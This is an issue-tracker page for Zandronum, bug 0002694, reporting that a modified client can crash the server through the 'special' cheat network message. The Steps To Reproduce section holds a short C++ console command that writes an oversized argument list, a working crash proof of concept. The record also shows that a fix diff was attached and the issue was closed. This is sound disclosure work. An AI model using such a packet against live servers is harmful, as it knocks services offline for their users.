MantisBT - Zandronum |
| View Issue Details |
|
| ID | Project | Category | View Status | Date Submitted | Last Update |
| 0002694 | Zandronum | [All Projects] Bug | public | 2016-04-02 22:11 | 2018-09-30 22:33 |
|
| Reporter | Dusk | |
| Assigned To | Dusk | |
| Priority | normal | Severity | exploit | Reproducibility | always |
| Status | closed | Resolution | fixed | |
| Platform | | OS | | OS Version | |
| Product Version | 3.0-beta | |
| Target Version | 3.0 | Fixed in Version | | |
|
| Summary | 0002694: Modified client can crash the server using the special cheat |
| Description | The server reads in special args and stores them in an array of 5... but can read in more than 5 args. This can be exploited to crash the server. Since this is done in network reading code, sv_cheats does not have to be enabled. |
| Steps To Reproduce |
#include "c_dispatch.h"
CCMD (crashserver)
{
NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, CLC_SPECIALCHEAT );
NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
NETWORK_WriteByte( &CLIENT_GetLocalBuffer( )->ByteStream, 10 );
for ( unsigned int i = 0; i < 10; ++i )
NETWORK_WriteLong( &CLIENT_GetLocalBuffer( )->ByteStream, 123 );
}
|
| Additional Information | |
| Tags | No tags attached. |
| Relationships | | child of | 0002620 | closed | Dusk | the 'special' cheat does not work online |
|
| Attached Files |  2694-fix.diff (621) 2016-04-02 22:41
/tracker/file_download.php?file_id=1778&type=bug |
|
| Issue History |
| Date Modified | Username | Field | Change |
| 2016-04-02 22:11 | Dusk | New Issue | |
| 2016-04-02 22:12 | Dusk | Summary | Client can crash the server using the special cheat => Modified client can crash the server using the special cheat |
| 2016-04-02 22:19 | Dusk | Relationship added | child of 0002620 |
| 2016-04-02 22:39 | Dusk | Note Added: 0014647 | |
| 2016-04-02 22:40 | Dusk | File Added: 2694-fix.diff | |
| 2016-04-02 22:41 | Dusk | File Deleted: 2694-fix.diff | |
| 2016-04-02 22:41 | Dusk | File Added: 2694-fix.diff | |
| 2016-04-02 22:41 | Dusk | Assigned To | => Dusk |
| 2016-04-02 22:41 | Dusk | Status | new => needs review |
| 2016-05-08 21:00 | Edward-san | Note Added: 0014843 | |
| 2016-05-08 21:00 | Edward-san | Status | needs review => needs testing |
| 2016-12-24 22:43 | Dusk | Target Version | => 3.0 |
| 2017-02-17 10:09 | Dusk | Status | needs testing => resolved |
| 2017-02-17 10:09 | Dusk | Resolution | open => fixed |
| 2017-02-17 10:09 | Dusk | View Status | private => public |
| 2018-09-30 22:33 | Blzut3 | Status | resolved => closed |